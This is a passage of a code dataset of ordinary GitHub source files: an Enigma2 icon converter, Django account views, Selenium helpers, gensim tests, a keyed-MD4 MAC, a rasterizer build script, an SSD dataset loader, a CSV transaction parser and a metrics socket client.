\"screen.png\"),\n\t\t(\"osdsetup\", \"screen.png\"),\n\t\t(\"parental_setup\", \"look.png\"),\n\t\t(\"password_setup\", \"net.png\"),\n\t\t(\"picturecenterfs\", \"picture.png\"),\n\t\t(\"plugin_select\", \"plugin.png\"),\n\t\t(\"plugin_selection\", \"plugin.png\"),\n\t\t(\"pluginhider_setup\", \"setup.png\"),\n\t\t(\"positioner_setup\", \"tuner.png\"),\n\t\t(\"powertimer_edit\", \"timer.png\"),\n\t\t(\"primary_skin_selector\", \"gui.png\"),\n\t\t(\"pvmc_mainmenu\", \"setup.png\"),\n\t\t(\"rcu select\", \"setup.png\"),\n\t\t(\"rec_setup\", \"setup.png\"),\n\t\t(\"recording_menu\", \"hdd.png\"),\n\t\t(\"recording_setup\", \"hdd.png\"),\n\t\t(\"recordpaths\", \"hdd.png\"),\n\t\t(\"remote_setup\", \"remote.png\"),\n\t\t(\"remotecode\", \"remote.png\"),\n\t\t(\"remotecontrolcode\", \"remote.png\"),\n\t\t(\"rfmod_setup\", \"setup.png\"),\n\t\t(\"run_kodi\", \"movie_list.png\"),\n\t\t(\"sat_ip_client\", \"net.png\"),\n\t\t(\"satfinder\", \"tuner.png\"),\n\t\t(\"saveepgcache\", \"movie_list.png\"),\n\t\t(\"scart_switch\", \"setup.png\"),\n\t\t(\"select_menu\", \"setup.png\"),\n\t\t(\"service_info_screen\", \"info.png\"),\n\t\t(\"service_searching_selection\", \"tuner.png\"),\n\t\t(\"setup_epgenhanced\", \"setup.png\"),\n\t\t(\"setup_epggraphical\", \"setup.png\"),\n\t\t(\"setup_epginfobar\", \"setup.png\"),\n\t\t(\"setup_epginfobargraphical\", \"setup.png\"),\n\t\t(\"setup_epgmulti\", \"setup.png\"),\n\t\t(\"setup_selection\", \"setup.png\"),\n\t\t(\"sibsetup\", \"setup.png\"),\n\t\t(\"skin_setup\", \"setup.png\"),\n\t\t(\"sleep\", \"timer.png\"),\n\t\t(\"software_manager\", \"restart.png\"),\n\t\t(\"software_update\", \"restart.png\"),\n\t\t(\"specialfeatures_menu\", \"setup.png\"),\n\t\t(\"standby\", \"power.png\"),\n\t\t(\"standby_restart_list\", \"shutdowntimer.png\"),\n\t\t(\"start_kodi\", 
\"movie_list.png\"),\n\t\t(\"startwizzard\", \"paket.png\"),\n\t\t(\"streamconvert\", \"net.png\"),\n\t\t(\"streaming_clients_info_screen\", \"info.png\"),\n\t\t(\"subtitle_selection\", \"setup.png\"),\n\t\t(\"subtitle_setup\", \"setup.png\"),\n\t\t(\"sundtek_control_enter\", \"setup.png\"),\n\t\t(\"supportchannel_ytchannel\", \"plugin.png\"),\n\t\t(\"system_selection\", \"setup.png\"),\n\t\t(\"tempfancontrol\", \"setup.png\"),\n\t\t(\"time_setup\", \"timer.png\"),\n\t\t(\"timer_edit\", \"timer.png\"),\n\t\t(\"timer_menu\", \"timer.png\"),\n\t\t(\"timezone_setup\", \"setup.png\"),\n\t\t(\"timshift_setup\", \"setup.png\"),\n\t\t(\"tuner_setup\", \"tuner.png\"),\n\t\t(\"ui_menu\", \"gui.png\"),\n\t\t(\"undefined\", \"keyb.png\"),\n\t\t(\"usage_setup\", \"setup.png\"),\n\t\t(\"user_interface\", \"gui.png\"),\n\t\t(\"vfd_ew\", \"setup.png\"),\n\t\t(\"vfd_ini\", \"setup.png\"),\n\t\t(\"video_clipping\", \"movie_list.png\"),\n\t\t(\"video_finetune\", \"screen.png\"),\n\t\t(\"video_menu\", \"screen.png\"),\n\t\t(\"video_setup\", \"screen.png\"),\n\t\t(\"videoenhancement_setup\", \"screen.png\"),\n\t\t(\"vmc_init_setup\", \"setup.png\"),\n\t\t(\"vmc_init_startvmc\", \"movie_list.png\"),\n\t\t(\"volume_adjust\", \"audio.png\"),\n\t\t(\"vps\", \"movie_list.png\"),\n\t\t(\"webradiofs\", \"audio.png\"),\n\t\t(\"yamp\", \"plugin.png\"),\n\t\t(\"yamp_music_player\", \"plugin.png\"),\n\t\t(\"youtube_tv\", \"plugin.png\")\n\t\t]\n\t\n\t@cached\n\tdef getText(self):\n\t\ttry:\n\t\t\tcur = self.source.current\n\t\t\tif cur and len(cur) > 2:\n\t\t\t\tselection = cur[2]\n\t\t\t\tname = self.path + selection + \".png\"\n\t\t\t\tif fileExists(name):\n\t\t\t\t\treturn name\n\t\t\t\tname = \"\"\n\t\t\t\tfor pair in self.names:\n\t\t\t\t\tif pair[0] == selection.lower():\n\t\t\t\t\t\tname = self.path + pair[1]\n\t\t\t\t\t\tif name != \"\" and fileExists(name):\n\t\t\t\t\t\t\treturn name\n\t\texcept:\n\t\t\tpass\n\t\tname = self.path + \"setup.png\"\n\t\tif fileExists(name):\n\t\t\treturn name\n\t\n\ttext = property(getText)\n","repo_name":"oerlgrey/PlatoonHD","sub_path":"usr/lib/enigma2/python/Components/Converter/PlatoonHDMenuIconPath.py","file_name":"PlatoonHDMenuIconPath.py","file_ext":"py","file_size_in_byte":7420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37530547254","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth import update_session_auth_hash, authenticate\nfrom django.contrib.auth import login as auth_login, logout as auth_logout\nfrom django.contrib.auth import get_user_model\nfrom .forms import CustomUserCreationForm, CustomUserChangeForm, CustomPasswordChangeForm, CustomAuthenticationForm\nfrom posts.models import Post\nfrom django.http import JsonResponse\nfrom schedules.models import Schedule\nimport os\nfrom django.urls import reverse_lazy\nfrom posts.models import Priority\nfrom django.db.models.functions import TruncMonth\nfrom django.db.models import Count\nfrom django.utils import timezone\nfrom django.core import serializers\nfrom django.views.generic.list import ListView\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom my_messages.models import Message\n\n\n# Create your views here.\n\ndef signup(request):\n if request.user.is_authenticated:\n return redirect('posts:index')\n\n if request.method == 'POST':\n form = CustomUserCreationForm(request.POST, request.FILES)\n if form.is_valid():\n user = 
form.save(commit=False)\n user.address = request.POST.get('address')\n user.save()\n return redirect('accounts:login')\n else:\n form = CustomUserCreationForm()\n\n context = {\n 'form': form,\n }\n return render(request, 'accounts/signup.html', context)\n\n\ndef login(request):\n if request.user.is_authenticated:\n return redirect('main')\n\n if request.method == 'POST':\n form = CustomAuthenticationForm(request, request.POST)\n if form.is_valid():\n auth_login(request, form.get_user())\n prev_url = request.session.get('prev_url')\n if prev_url: \n del request.session['prev_url']\n return redirect(prev_url)\n return redirect('main')\n return redirect('accounts:login')\n else:\n form = CustomAuthenticationForm()\n request.session['prev_url'] = request.META.get('HTTP_REFERER')\n context = {\n 'form': form,\n }\n return render(request, 'accounts/login.html', context)\n\n\n@login_required\ndef logout(request):\n auth_logout(request)\n return redirect('main')\n \n\n@login_required\ndef delete(request):\n request.user.delete()\n return redirect('main')\n\n\n@login_required\ndef update(request):\n if request.method == 'POST':\n form = CustomUserChangeForm(\n request.POST, request.FILES, instance=request.user)\n if form.is_valid():\n user = form.save(commit=False)\n user.address = request.POST.get('address')\n user.save()\n return redirect('accounts:profile', request.user.username)\n else:\n form = CustomUserChangeForm(instance=request.user)\n context = {\n 'form': form,\n }\n return render(request, 'accounts/update.html', context)\n\n\n@login_required\ndef change_password(request):\n if request.method == 'POST':\n form = CustomPasswordChangeForm(request.user, request.POST)\n if form.is_valid():\n user = form.save()\n update_session_auth_hash(request, user)\n return redirect('main')\n else:\n form = CustomPasswordChangeForm(request.user)\n context = {\n 'form': form,\n }\n return render(request, 'accounts/change_password.html', context)\n\n \n@login_required\ndef profile(request, username):\n User = get_user_model()\n person = User.objects.get(username=username)\n user_id = request.user.id\n like_post = person.like_posts.all()\n liked_posts = like_post.exclude(priority__user=request.user)\n # priority_range = range(1, 11)\n # priority_range2 = range(6, 11)\n priorities = Priority.objects.filter(user=request.user).order_by('priority')\n schedules = Schedule.objects.filter(user_id=user_id, start__gte=timezone.now()).order_by('start__date', 'end__date')\n messages = Message.objects.filter(receiver=request.user)\n sentmessages = Message.objects.filter(sender=request.user)\n\n context = {\n 'person': person,\n 'followings': person.followings.all(),\n 'followers': person.followers.all(),\n 'priorities': priorities,\n 'schedules': schedules,\n 'liked_posts': liked_posts,\n 'messages': messages,\n 'sentmessages': sentmessages,\n }\n\n return render(request, 'accounts/profile.html', context)\n\n\n@login_required\ndef follow(request, user_pk):\n User = get_user_model()\n person = User.objects.get(pk=user_pk)\n\n if person != request.user:\n if request.user in person.followers.all():\n person.followers.remove(request.user)\n is_followed = False\n else:\n person.followers.add(request.user)\n is_followed = True\n context = {\n 'is_followed': is_followed,\n 'followings_count': person.followings.count(),\n 'followers_count': person.followers.count(),\n }\n return JsonResponse(context)\n return redirect('accounts:profile', person.username)\n\n\n@login_required\ndef following_list(request, username):\n User = 
get_user_model()\n person = User.objects.get(username=username)\n followings = person.followings.all()\n context = {\n 'followings': followings,\n }\n return render(request, 'accounts/following_list.html', context)\n\n\n@login_required\ndef followers_list(request, username):\n User = get_user_model()\n person = User.objects.get(username=username)\n followers = person.followers.all()\n context = {\n 'followers': followers,\n }\n return render(request, 'accounts/followers_list.html', context)\n\ndef priority_list(request, username):\n user_id = request.user.id\n User = get_user_model()\n person = User.objects.get(username=username)\n priorities = Priority.objects.filter(user=person).order_by('priority')\n data = []\n for priority in priorities:\n post_data = serializers.serialize('python', [priority.post])[0]\n post = post_data['fields']\n post['pk'] = post_data['pk']\n data.append({'post': post})\n return JsonResponse(data, safe=False)\n","repo_name":"Camping-PJT/2nd","sub_path":"accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6259,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"17241633896","text":"import time\nimport logging\n\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.common.exceptions import StaleElementReferenceException, \\\n ElementNotInteractableException, ElementClickInterceptedException\n\nfrom lib.wait_utils import BroweserWait\n\nlog = logging.getLogger(__name__)\n\nclass Portal:\n \"\"\" This file contains custome function for send_keys, click \"\"\"\n\n def __init__(self, browser):\n self.browser = browser\n\n def get_wait(self, element=None):\n return BroweserWait(self.browser, element)\n\n def click(self, locator):\n attempts = 5\n while attempts != 0:\n try:\n element = self.get_wait(locator).wait_for_clickable()\n element.click()\n time.sleep(2)\n break\n except (StaleElementReferenceException, \\\n ElementClickInterceptedException, ElementNotInteractableException):\n time.sleep(2)\n attempts = attempts - 1\n log.info(f'{locator} element became stale, {attempts} attempts remaining')\n\n def send_text(self, locator, value):\n self.get_wait(locator).wait_for_clickable()\n self.browser.find_element(*locator).send_keys(Keys.CONTROL + 'a')\n self.browser.find_element(*locator).send_keys(Keys.DELETE)\n self.browser.find_element(*locator).send_keys(value)\n\n def is_element_present(self, element):\n try:\n self.browser.find_element(*element)\n return True\n except NoSuchElementException:\n return False\n\n\n","repo_name":"nithyaudhaya/cypress-realworld-automation","sub_path":"pages/portal.py","file_name":"portal.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28520357354","text":"import logging\nimport unittest\n\nfrom gensim.topic_coherence import probability_estimation\nfrom gensim.corpora.hashdictionary import HashDictionary\n\nclass TestProbabilityEstimation(unittest.TestCase):\n def setUp(self):\n self.texts = [['human', 'interface', 'computer'],\n ['eps', 'user', 'interface', 'system'],\n ['system', 'human', 'system', 'eps'],\n ['user', 'response', 'time'],\n ['trees'],\n ['graph', 'trees']]\n self.dictionary = HashDictionary(self.texts)\n # Following is the mapping:\n # {'computer': 10608,\n # 'eps': 31049,\n # 'graph': 18451,\n # 'human': 31002,\n # 'interface': 12466,\n # 'response': 5232,\n 
# 'system': 5798,\n # 'time': 29104,\n # 'trees': 23844,\n # 'user': 12736}\n self.corpus = [self.dictionary.doc2bow(text) for text in self.texts]\n # Suppose the segmented topics from s_one_pre are:\n self.segmented_topics = [[(5798, 18451), (10608, 18451), (10608, 5798)], [(10608, 18451), (12736, 18451), (12736, 10608)]]\n\n def testPBooleanDocument(self):\n \"\"\"Test p_boolean_document()\"\"\"\n # Unique topic ids are 5798, 10608, 12736 and 18451\n obtained, _ = probability_estimation.p_boolean_document(self.corpus, self.segmented_topics)\n expected = {18451: set([5]), 12736: set([1, 3]), 5798: set([1, 2]), 10608: set([0])}\n self.assertTrue(obtained == expected)\n\n def testPBooleanSlidingWindow(self):\n \"\"\"Test p_boolean_sliding_window()\"\"\"\n # Test with window size as 2. window_id is zero indexed.\n obtained, _ = probability_estimation.p_boolean_sliding_window(self.texts, self.segmented_topics, self.dictionary, 2)\n expected = {10608: set([1]), 12736: set([8, 2, 3]), 18451: set([11]), 5798: set([4, 5, 6, 7])}\n self.assertTrue(obtained == expected)\n\nif __name__ == '__main__':\n logging.root.setLevel(logging.WARNING)\n unittest.main()\n","repo_name":"jeetmehta/Lung-Cancer-Classification","sub_path":"syde-522-env/lib/python2.7/site-packages/gensim/test/test_probability_estimation.py","file_name":"test_probability_estimation.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"37"} +{"seq_id":"70172133867","text":"import hashlib\n\n\ndef MD4MAC(ipBytes, key):\n md4Input = key+ipBytes\n hashAlgo = hashlib.new('md4')\n hashAlgo.update(md4Input)\n mac = hashAlgo.digest()\n return mac\n\n\ndef main():\n key = bytes(''.encode('latin1'))\n mac = MD4MAC(key, key)\n print(mac.hex())\n\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"D-setia/CryptoPals","sub_path":"set4/chall_30/implementMD4keyedMAC.py","file_name":"implementMD4keyedMAC.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1843412089","text":"from setuptools import setup, find_packages\nfrom typing import List\nimport os\nfrom typing import List, Optional\n\nimport torch\nfrom torch.utils.cpp_extension import CUDA_HOME, BuildExtension, CUDAExtension, CppExtension\n\ndef get_existing_ccbin(nvcc_args: List[str]) -> Optional[str]:\n \"\"\"\n Given a list of nvcc arguments, return the compiler if specified.\n\n Note from CUDA doc: Single value options and list options must have\n arguments, which must follow the name of the option itself by either\n one of more spaces or an equals character.\n \"\"\"\n last_arg = None\n for arg in reversed(nvcc_args):\n if arg == \"-ccbin\":\n return last_arg\n if arg.startswith(\"-ccbin=\"):\n return arg[7:]\n last_arg = arg\n return None\n\nextra_compile_args = {\"cxx\": [\"-std=c++14\"]}\ndefine_macros = []\n\nforce_cuda = os.getenv(\"FORCE_CUDA\", \"0\") == \"1\"\nif (torch.cuda.is_available() and CUDA_HOME is not None) or force_cuda:\n extension = CUDAExtension\n # sources += source_cuda\n define_macros += [(\"WITH_CUDA\", None)]\n nvcc_args = [\n \"-DCUDA_HAS_FP16=1\",\n \"-D__CUDA_NO_HALF_OPERATORS__\",\n \"-D__CUDA_NO_HALF_CONVERSIONS__\",\n \"-D__CUDA_NO_HALF2_OPERATORS__\",\n ]\n nvcc_flags_env = os.getenv(\"NVCC_FLAGS\", \"\")\n if nvcc_flags_env != \"\":\n nvcc_args.extend(nvcc_flags_env.split(\" \"))\n\n # It's better if pytorch can do this by default ..\n # CC = 
os.environ.get(\"CC\", None)\n # if CC is not None:\n # CC_arg = \"-ccbin={}\".format(CC)\n # if CC_arg not in nvcc_args:\n # if any(arg.startswith(\"-ccbin\") for arg in nvcc_args):\n # raise ValueError(\"Inconsistent ccbins\")\n # nvcc_args.append(CC_arg)\n\n \n CC = os.environ.get(\"CC\", None)\n if CC is not None:\n existing_CC = get_existing_ccbin(nvcc_args)\n if existing_CC is None:\n CC_arg = \"-ccbin={}\".format(CC)\n nvcc_args.append(CC_arg)\n elif existing_CC != CC:\n msg = f\"Inconsistent ccbins: {CC} and {existing_CC}\"\n raise ValueError(msg)\n\n extra_compile_args[\"nvcc\"] = nvcc_args\nelse:\n print('Cuda is not available!')\n\n\next_modules = [\n CUDAExtension('rasterizer._C', [\n 'rasterizer/csrc/ext.cpp',\n 'rasterizer/csrc/rasterize_points.cu',\n 'rasterizer/csrc/rasterize_points_cpu.cpp'\n ],\n include_dirs=['rasterizer/csrc'],\n define_macros=define_macros,\n extra_compile_args=extra_compile_args\n )\n]\n\n\nsetup(\n name='pytorch-rasterizer',\n version='0.1',\n ext_modules=ext_modules,\n cmdclass={'build_ext': BuildExtension}\n)\n","repo_name":"yizhangphd/FreqPCR","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2646,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"37"} +{"seq_id":"38426234027","text":"\"\"\"\nNAME\n warm_up\n\nDESCRIPTION\n Provides the possibility to pre-train models.\n\"\"\"\n\nimport torch\nimport globals.constants as const\n\n\ndef warm_up(model, lr, n_epochs):\n \"\"\"\n Does pure data warm-up training.\n Uses the Mean Squared Error as loss function.\n Does not track any metrics or parameters.\n\n Parameter:\n model: pytorch model\n lr: learning rate\n n_epochs: number of epochs\n\n Returns:\n model: warmed-up model\n \"\"\"\n\n # Loss function\n loss = torch.nn.MSELoss()\n\n # Send loss to GPU if possible\n # If cuda GPU available the models would already be there\n if const.cuda:\n loss.cuda()\n\n # Optimizers\n optimizer = torch.optim.Adam(model.parameters(), lr, betas=(0.5, 0.999))\n\n # ==============================\n # Warm up training\n # ==============================\n\n for epoch in range(n_epochs):\n for st_train, U_train in const.dataloader_train:\n\n optimizer.zero_grad()\n\n # Predict\n predictions = model(st_train)\n\n # Loss of predictions\n data_loss = loss(predictions, U_train)\n\n # Optimize model\n data_loss.backward()\n optimizer.step()\n\n return model\n","repo_name":"marcus-muenzer/Neural-Network-Reconstruction-of-higher-dimensional-Plasma-Space-Time","sub_path":"src/training/warm_up.py","file_name":"warm_up.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25460697550","text":"import base64\nimport csv\nfrom io import StringIO\n\nfrom sqlalchemy.ext.asyncio import AsyncSession\nfrom src import crud\nfrom src.models.category import CategoryCreate\nfrom src.models.transaction import TransactionCreate\n\n\nasync def parser(db: AsyncSession, *, mapping: dict, file: str, user_id: int, account_id: int, budget_id: int) -> bool:\n # mapping example {\"Date\": \"date\", \"Description\": \"desc\", \"Amount\": \"amnt\"}\n # mapping example with category {\"Date\": \"date\", \"Description\": \"desc\", \"Amount\": \"amnt\", \"Category\": \"category\"}\n\n # Example Header row from a csv file\n # Transaction Date,Clear Date,Description,Category,Amount,Current Balance\n\n filterData = await crud.filter.get_all_filters_for_user(db, user_id=user_id, 
limit=-1)\n if filterData is not None:\n filters = filterData[\"paginated_results\"]\n else:\n filters = None\n categoryData = await crud.category.get_all_categories_for_user(db, user_id=user_id, limit=-1)\n if categoryData is not None:\n categories = categoryData[\"paginated_results\"]\n else:\n categories = None\n default_category = await crud.category.get_unsorted_category_for_budget(db, user_id=user_id, budget_id=budget_id)\n if default_category:\n default_category_id = default_category.id\n else:\n categoryCreate = CategoryCreate(name=\"Unsorted\", desc=\"Created when uploading a file\", amount=-1)\n new_category = await crud.category.create(db, obj_in=categoryCreate, user_id=user_id, budget_id=budget_id)\n default_category_id = new_category.id\n\n decoded_data = base64.b64decode(file.split(\",\")[1])\n lines = decoded_data.decode(\"utf-8\")\n\n csvfile = StringIO(lines)\n csvreader = csv.reader(csvfile)\n file_lines = iter(csvreader)\n header_row = next(file_lines)\n indexes = {}\n # to figure out column mapping\n for col in header_row:\n if col in mapping:\n index = header_row.index(col)\n indexes[index] = mapping[col]\n # indexes example value {0: \"date\", 2: \"desc\", 4: \"amnt\"}\n has_categories = False\n if \"category\" in indexes.values():\n has_categories = True\n\n for row in csvreader:\n # row example = 3/11/2023,3/12/2023,THIS IS A DESCRIPTION,3000,Food,1000000\n split_row = row\n new_transaction = {}\n for index, column_name in indexes.items():\n try:\n new_transaction[column_name] = split_row[index]\n except IndexError:\n # this most likely means that the csv file is not formatted correctly\n return False\n category_id = None\n if has_categories and new_transaction[\"category\"] is not None:\n if categories is not None and isinstance(categories, list):\n for category in categories:\n if category.name.lower() == new_transaction[\"category\"].lower():\n category_id = category.id\n break\n\n if category_id is None and new_transaction[\"category\"] is not None and new_transaction[\"category\"] != \"\":\n categoryCreate = CategoryCreate(\n name=new_transaction[\"category\"], desc=\"Created when uploading a file\", amount=-1\n )\n new_category = await crud.category.create(\n db, obj_in=categoryCreate, user_id=user_id, budget_id=budget_id\n )\n categoryData = await crud.category.get_all_categories_for_user(db, user_id=user_id)\n if categoryData is not None:\n categories = categoryData[\"paginated_results\"]\n category_id = new_category.id\n\n # new_transaction {\"date\": \"3/11/2023\", \"desc\": \"THIS IS A DESCRIPTION\", \"amnt\": \"3000\"}\n if filters is not None and type(filters) == list:\n for filter in filters:\n if filter.filter_by.lower() in new_transaction[\"desc\"].lower():\n category_id = filter.category_id\n break\n\n if category_id is None:\n category_id = default_category_id\n\n transaction_create = TransactionCreate(\n amount=float(new_transaction[\"amnt\"]), desc=new_transaction[\"desc\"], date=new_transaction[\"date\"]\n )\n\n await crud.transaction.create(\n db,\n obj_in=transaction_create,\n user_id=user_id,\n category_id=category_id,\n account_id=account_id,\n budget_id=budget_id,\n )\n\n return True\n","repo_name":"NADEE-MJ/peppermint","sub_path":"backend/src/core/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":4519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5570310409","text":"import numpy as np\nimport os.path as osp\nfrom itertools import product as product\nfrom 
math import sqrt as sqrt\nfrom pathlib import Path\nimport xml.etree.ElementTree as ET\n\n\nimport torch.utils.data as data\nimport torch\nimport cv2\n\nfrom .transforms import *\n\nclass Anno_xml2list(object):\n    def __init__(self, classes):\n        self.classes = classes\n\n    def __call__(self, xml_path, width, height):\n        ret = []\n        xml = ET.parse(xml_path).getroot()\n        for obj in xml.iter('object'):\n            difficult = int(obj.find('difficult').text)\n            if difficult == 1:\n                continue\n\n            bndbox = []\n\n            name = obj.find('name').text.lower().strip()  # object name\n            bbox = obj.find('bndbox')  # bounding box information\n\n            pts = ['xmin', 'ymin', 'xmax', 'ymax']\n            for pt in (pts):\n                cur_pixel = int(bbox.find(pt).text) - 1\n                if pt == 'xmin' or pt == 'xmax':  # divide by the width for x coordinates\n                    cur_pixel /= width\n                else:  # divide by the height for y coordinates\n                    cur_pixel /= height\n\n                bndbox.append(cur_pixel)\n\n            label_idx = self.classes.index(name)\n            bndbox.append(label_idx)\n\n            ret += [bndbox]\n\n        return np.array(ret)  # [[xmin, ymin, xmax, ymax, label_ind], ... ]\n\ndef od_collate_fn(batch):\n    targets = []\n    imgs = []\n    for sample in batch:\n        imgs.append(sample[0])  # sample[0] is the image img\n        targets.append(torch.FloatTensor(sample[1]))  # sample[1] is the annotation gt\n\n    imgs = torch.stack(imgs, dim=0)\n\n    return imgs, targets\n\n\n\nclass DataTransform():\n    def __init__(self, input_size, params):\n        self.data_transform = {\n            'train': Compose([\n                ConvertFromInts(),  # convert int to float32\n                ToAbsoluteCoords(),  # undo the normalization of the annotation data\n                PhotometricDistort(),  # randomly change the color tone of the image\n                Expand(params[\"color_mean\"]),  # expand the image canvas\n                RandomSampleCrop(),  # randomly crop a region of the image\n                RandomVerticalFlip(p=0.5),  # added in this implementation\n                #RandomHorizontalFlip(p=0.5),  # added in this implementation\n                ToPercentCoords(),  # normalize the annotation data to 0-1\n                Resize(input_size),  # resize the image to input_size x input_size\n                SubtractMeans(params[\"color_mean\"])  # subtract the mean BGR color values\n            ]),\n            'val': Compose([\n                ConvertFromInts(),  # convert int to float\n                Resize(input_size),  # resize the image to input_size x input_size\n                SubtractMeans(params[\"color_mean\"])  # subtract the mean BGR color values\n            ])\n        }\n\n    def __call__(self, img, phase, boxes, labels):\n        return self.data_transform[phase](img, boxes, labels)\n\n\nclass TrainDataset(data.Dataset):\n    def __init__(self, img_list, anno_list, phase, transform, transform_anno):\n        self.img_list = img_list\n        self.anno_list = anno_list\n        self.phase = phase  # specify train or val\n        self.transform = transform  # image transform\n        self.transform_anno = transform_anno  # annotation data from xml to list\n\n    def __len__(self):\n        return len(self.img_list)\n\n    def __getitem__(self, index):\n        im, gt, h, w = self.pull_item(index)\n        return im, gt\n\n    def pull_item(self, index):\n        image_file_path = self.img_list[index]\n        img = cv2.imread(image_file_path)  # [height][width][color BGR]\n        height, width, channels = img.shape  # get the image size\n\n        anno_file_path = self.anno_list[index]\n        anno_list = self.transform_anno(anno_file_path, width, height) #np.array([[xmin, ymin, xmax, ymax, label], [...]]\n\n        img, boxes, labels = self.transform(img, self.phase, anno_list[:, :4], anno_list[:, 4])\n        img = torch.from_numpy(img[:, :, (2, 1, 0)]).permute(2, 0, 1)\n        gt = np.hstack((boxes, np.expand_dims(labels, axis=1)))\n        return img, gt, height, width\n\nclass TestDataset(data.Dataset):\n    def __init__(self, img_list, phase, transform):\n        self.img_list = img_list\n        self.phase = phase  # specify train or val\n        self.transform = transform  # image transform\n\n    def __len__(self):\n        return len(self.img_list)\n\n    def __getitem__(self, index):\n        im = self.pull_item(index)\n        return im\n\n    def pull_item(self, index):\n        image_file_path = self.img_list[index]\n        img = 
cv2.imread(image_file_path)  # [height][width][color BGR]\n        height, width, channels = img.shape  # get the image size\n        anno_list = np.array([0, 1, 2, 3, 4]).reshape(1, 5)  # dummy data\n\n        img, boxes, labels = self.transform(img, self.phase, [], anno_list[:, 4])\n        img = torch.from_numpy(img[:, :, (2, 1, 0)]).permute(2, 0, 1)\n        return img\n\ndef get_dataloader(dataset, batch_size, num_workers, shuffle, drop_last, collate_fn=None):\n    dataloader = data.DataLoader(\n        dataset=dataset,\n        batch_size=batch_size,\n        num_workers=num_workers,\n        shuffle=shuffle,\n        collate_fn=collate_fn,\n        drop_last=drop_last,\n    )\n    return dataloader\n\nclass OneTestDataset(data.Dataset):\n    def __init__(self, img, phase, transform):\n        self.img = img\n        self.phase = phase\n        self.transform = transform  # image transform\n\n    def __len__(self):\n        return 1\n\n    def __getitem__(self, index):\n        im = self.pull_item(index)\n        return im\n\n    def pull_item(self, index):\n        height, width, channels = self.img.shape  # get the image size\n        anno_list = np.array([0, 1, 2, 3, 4]).reshape(1, 5)  # dummy data\n\n        img, boxes, labels = self.transform(self.img, self.phase, [], anno_list[:, 4])\n        img = torch.from_numpy(img[:, :, (2, 1, 0)]).permute(2, 0, 1)\n        return img","repo_name":"mitsuhiko-nozawa/SSD_Application","sub_path":"src/libs/dataset/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":6164,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"4347315203","text":"import socket\nimport time\n\n\nclass ClientError(Exception):  # must derive from Exception to be raisable\n    pass\n\n\nclass Client:\n    def __init__(self, host, port, timeout):\n        self.sock = socket.create_connection((host, port), timeout=timeout)\n\n    def put(self, key, value, timestamp=None):\n        send_time = timestamp\n        if not send_time:\n            send_time = int(time.time())\n\n        send_string = \"put \" + key + \" \" + str(value) + \" \" + str(send_time) + \"\\n\"\n        self.sock.sendall(send_string.encode(\"utf8\"))\n        raw_data = self.sock.recv(1024).decode(\"utf8\")\n#        print(raw_data) #debug\n#        raw_data = 'ok\\n\\n' #debug\n\n        if raw_data == 'error\\nwrong command\\n\\n':\n            raise ClientError\n        if not raw_data == 'ok\\n\\n':\n#            print(\"WTF\") #debug\n            raise ClientError\n\n    def get(self, key):\n        self.sock.sendall((\"get \" + key + \"\\n\").encode(\"utf8\"))\n        raw_data = self.sock.recv(1024)\n        raw_data = raw_data.decode(\"utf8\")\n#        raw_data = 'ok\\n\\n' #debug\n        if raw_data == 'ok\\n\\n':\n            return {}\n        elif not raw_data[:2] == 'ok':\n#            print(\"NOT STARTS WITH OK\") #debug\n            raise ClientError\n        elif not raw_data[-2:] == '\\n\\n':\n#            print(\"NOT FINISHES WITH LFLF\") #debug\n            raise ClientError\n        else:\n            data = raw_data.split('\\n')[1:-2]\n\n            ans = dict()\n            for current_data in data:\n                data_split = current_data.split(' ')\n\n                key = data_split[0]\n                metric = float(data_split[1])\n                timestamp = int(data_split[2])\n\n                if key in ans.keys():\n                    ans[key].append((timestamp, metric))\n                else:\n                    ans[key] = [(timestamp, metric)]\n\n            return ans\n\n\nif __name__ == '__main__':\n    test_server = False\n\n    if test_server:\n        client = Client(\"127.0.0.1\", 10001, timeout=15)\n\n        client.put(\"palm.cpu\", 0.5, timestamp=1150864247)\n        client.put(\"palm.cpu\", 2.0, timestamp=1150864248)\n        client.put(\"palm.cpu\", 0.5, timestamp=1150864248)\n\n        client.put(\"eardrum.cpu\", 3, timestamp=1150864250)\n        client.put(\"eardrum.cpu\", 4, timestamp=1150864251)\n        client.put(\"eardrum.memory\", 4200000)\n","repo_name":"Niira/Coursera-Programming-in-Python","sub_path":"1 - Diving in Python/Week 5/Tasks/1 - 
